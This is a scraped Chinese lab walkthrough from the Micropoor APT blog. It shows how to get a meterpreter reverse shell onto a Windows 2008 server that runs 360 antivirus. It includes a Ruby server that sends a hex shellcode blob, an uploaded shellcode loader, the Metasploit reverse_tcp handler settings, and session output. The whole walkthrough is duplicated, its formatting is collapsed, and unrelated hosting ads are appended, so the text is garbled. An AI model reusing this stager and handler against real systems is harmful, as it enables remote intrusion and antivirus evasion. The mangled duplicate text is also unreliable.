靶机mscorsvw
mscorsvw 时间:2021-05-23 阅读:()
专注APT攻击与防御https://micropoor.
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
blogspot.
com/攻击机:192.
168.
1.
4Debian靶机:192.
168.
1.
2Windows2008目标机安装:360卫士+360杀毒12[*]磁盘列表[C:D:E:]34C:\inetpub\wwwroot\>tasklist56映像名称PID会话名会话#内存使用78SystemIdleProcess0024K9System40372K10smss.
exe2360956K11csrss.
exe32405,572K12csrss.
exe364114,452K13wininit.
exe37204,508K14winlogon.
exe40815,364K15services.
exe46807,376K16lsass.
exe47609,896K17lsm.
exe48403,876K18svchost.
exe57608,684K19vmacthlp.
exe63203,784K20svchost.
exe67607,384K21svchost.
exe764012,716K22svchost.
exe800029,792K23svchost.
exe848011,248K24svchost.
exe90009,308K25svchost.
exe940016,184K26svchost.
exe332011,800K27spoolsv.
exe548015,568K28svchost.
exe105208,228K29svchost.
exe107608,808K30svchost.
exe114402,576K31VGAuthService.
exe1216010,360K32vmtoolsd.
exe1300018,068K33ManagementAgentHost.
exe133208,844K34svchost.
exe1368011,884K35WmiPrvSE.
exe1768013,016K36dllhost.
exe1848011,224K37msdtc.
exe194007,736K38WmiPrvSE.
exe1440019,768K39mscorsvw.
exe29604,732K40mscorsvw.
exe58405,088K41sppsvc.
exe147608,408K42taskhost.
exe261216,344K43dwm.
exe286814,604K44explorer.
exe2896144,912K45vmtoolsd.
exe3008117,744K46TrustedInstaller.
exe2268015,776K47360Tray.
exe268416,056K48360sd.
exe263611,316K49ZhuDongFangYu.
exe2456014,292K50360rp.
exe1712127,072K51SoftMgrLite.
exe864116,816K52w3wp.
exe3300042,836K53svchost.
exe384004,584K54notepad.
exe371215,772K55cmd.
exe338402,376K56conhost.
exe352003,420K57tasklist.
exe309605,276K581C:\>dir2驱动器C中的卷没有标签.
3卷的序列号是C6F8‐9BAB45C:\的目录672017/12/1303:28inetpub82009/07/1411:20PerfLogs92017/12/1303:28ProgramFiles102019/01/2314:09ProgramFiles(x86)112019/01/2314:15Users122017/12/1303:25Windows130个文件0字节146个目录21,387,132,928可用字节15目标机位x64位Windows20081C:\>ver23MicrosoftWindows[版本6.
1.
7600]配置payload:1root@John:/var/www/html#cat.
/Micropoor_rev.
rb2require'socket'3ifARGV.
empty4puts"Usage:"5puts"Micropoor.
rbport"6exit7end89PORT=ARGV.
first.
to_i1011defhandle_connection(client)12puts"Payloadison‐line#{client}"1314client.
write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f748315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a5522ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a60baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec783e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b9266385ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dccee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa84676ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeece09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a28908e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")15client.
close16end1718socket=TCPServer.
new('0.
0.
0.
0',PORT)19puts"Listeningon#{PORT}.
"2021whileclient=socket.
accept22Thread.
new{handle_connection(client)}23end2425root@John:/var/www/html#ruby.
/Micropoor_rev.
rb808026Listeningon8080.
27上传Micropoor_shellcode_x64.
exe配置msf:1msfexploit(multi/handler)>useexploit/multi/handler2msfexploit(multi/handler)>setpayloadwindows/x64/meterpreter/reverse_tcp3payload=>windows/x64/meterpreter/reverse_tcp4msfexploit(multi/handler)>showoptions56Moduleoptions(exploit/multi/handler):78NameCurrentSettingRequiredDescription9101112Payloadoptions(windows/x64/meterpreter/reverse_tcp):1314NameCurrentSettingRequiredDescription1516EXITFUNCprocessyesExittechnique(Accepted:'',seh,thread,process,none)17LHOST192.
168.
1.
4yesThelistenaddress(aninterfacemaybespecified)18LPORT53yesThelistenport192021Exploittarget:2223IdName24‐‐‐‐‐‐250WildcardTarget262728msfexploit(multi/handler)>exploit2930[*]StartedreverseTCPhandleron192.
168.
1.
4:5331靶机执行:1msfexploit(multi/handler)>exploit23[*]StartedreverseTCPhandleron192.
168.
1.
4:534[*]Sendingstage(206403bytes)to192.
168.
1.
25[*]Meterpretersession6opened(192.
168.
1.
4:53‐>192.
168.
1.
2:49744)at2019‐01‐2301:29:00‐050067meterpreter>getuid8Serverusername:IISAPPPOOL\DefaultAppPool9meterpreter>sysinfo10Computer:WIN‐5BMI9HGC42S11OS:Windows2008R2(Build7600).
12Architecture:x6413SystemLanguage:zh_CN14Domain:WORKGROUP15LoggedOnUsers:116Meterpreter:x64/windows17meterpreter>ipconfig1819Interface12021Name:SoftwareLoopbackInterface122HardwareMAC:00:00:00:00:00:0023MTU:429496729524IPv4Address:127.
0.
0.
125IPv4Netmask:255.
0.
0.
026IPv6Address:::127IPv6Netmask:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff282930Interface113132Name:Intel(R)PRO/1000MTNetworkConnection33HardwareMAC:00:0c:29:bc:0d:5c34MTU:150035IPv4Address:192.
168.
1.
236IPv4Netmask:255.
255.
255.
037IPv6Address:fe80::5582:70c8:a5a8:822338IPv6Netmask:ffff:ffff:ffff:ffff::391meterpreter>ps23ProcessList456PIDPPIDNameArchSessionUserPath7800[SystemProcess]940System102364smss.
exe11296468mscorsvw.
exe12324316csrss.
exe13332468svchost.
exe14364356csrss.
exe15372316wininit.
exe16408356winlogon.
exe17468372services.
exe18476372lsass.
exe19484372lsm.
exe20548468spoolsv.
exe21576468svchost.
exe22584468mscorsvw.
exe23632468vmacthlp.
exe24676468svchost.
exe25764468svchost.
exe26800468svchost.
exe27848468svchost.
exe288642684SoftMgrLite.
exe29900468svchost.
exe30940468svchost.
exe311052468svchost.
exe321076468svchost.
exe331144468svchost.
exe341216468VGAuthService.
exe351300468vmtoolsd.
exe361332468ManagementAgentHost.
exe371368468svchost.
exe381440576WmiPrvSE.
exe391476468sppsvc.
exe4017122636360rp.
exe411768576WmiPrvSE.
exe421848468dllhost.
exe431940468msdtc.
exe442456468ZhuDongFangYu.
exe452612468taskhost.
exe4626361096360sd.
exe4726841096360Tray.
exe4827883408Micropoor_shellcode_x64.
exex640IISAPPPOOL\DefaultAppPoolC:\inetpub\wwwroot\Micropoor_shellcode_x64.
exe492868900dwm.
exe5028962852explorer.
exe5130082896vmtoolsd.
exe523196468svchost.
exe5333001368w3wp.
exex640IISAPPPOOL\DefaultAppPoolc:\windows\system32\inetsrv\w3wp.
exe5434083300cmd.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\cmd.
exe5537122896notepad.
exe564092324conhost.
exex640IISAPPPOOL\DefaultAppPoolC:\Windows\system32\conhost.
exe5758meterpreter>59靶机:附录:Micropoor_shellcodeforpayloadbackdoorhttps://micropoor.
blogspot.
com/2019/01/micropoorshellcode-for-payload-backdoor.
htmlMicropoor
- 靶机mscorsvw相关文档
- optedmscorsvw
- Hiddenmscorsvw
- 进程mscorsvw进程占用CPU高怎么办
- 进程mscorsvw进程CPU占用高的问题
- 进程解决mscorsvw进程CPU占用高的方法
- 进程解决mscorsvw进程CPU占用高的方法
TmhHost 全场八折优惠且充值返10% 多款CN2线路
TmhHost 商家是一家成立于2019年的国人主机品牌。目前主营的是美国VPS以及美国、香港、韩国、菲律宾的独立服务器等,其中VPS业务涵盖香港CN2、香港NTT、美国CN2回程高防、美国CN2 GIA、日本软银、韩国cn2等,均为亚太中国直连优质线路,TmhHost提供全中文界面,支持支付宝付款。 TmhHost黑五优惠活动发布了,全场云服务器、独立服务器提供8折,另有充值返现、特价服务器促销...
木木云35元/月,美国vps服务器优惠,1核1G/500M带宽/1T硬盘/4T流量
木木云怎么样?木木云品牌成立于18年,此为贵州木木云科技有限公司旗下新运营高端的服务器的平台,目前已上线美国中部大盘鸡,母鸡采用E5-267X系列,硬盘全部组成阵列。目前,木木云美国vps进行了优惠促销,1核1G/500M带宽/1T硬盘/4T流量,仅35元/月。点击进入:木木云官方网站地址木木云优惠码:提供了一个您专用的优惠码: yuntue目前我们有如下产品套餐:DV型 1H 1G 500M带宽...
PacificRack(年付低至19美元),夏季促销PR-M系列和多IP站群VPS主机
这几天有几个网友询问到是否有Windows VPS主机便宜的VPS主机商。原本他们是在Linode、Vultr主机商挂载DD安装Windows系统的,有的商家支持自定义WIN镜像,但是这些操作起来特别效率低下,每次安装一个Windows系统需要一两个小时,所以如果能找到比较合适的自带Windows系统的服务器那最好不过。这不看到PacificRack商家有提供夏季促销活动,其中包括年付便宜套餐的P...
mscorsvw为你推荐
-
2019年全省职业院校学生技能大赛路由routeAssumegraphspeakingphp设置win7支持ipad敬请参阅报告结尾处免责声明windows键是哪个Windows键是哪个键啊?tcpip上的netbiostcp 协议里的 netbios . 在哪,找不到联通版iphone4s怎么知道到苹果4s是联通版,还是移动版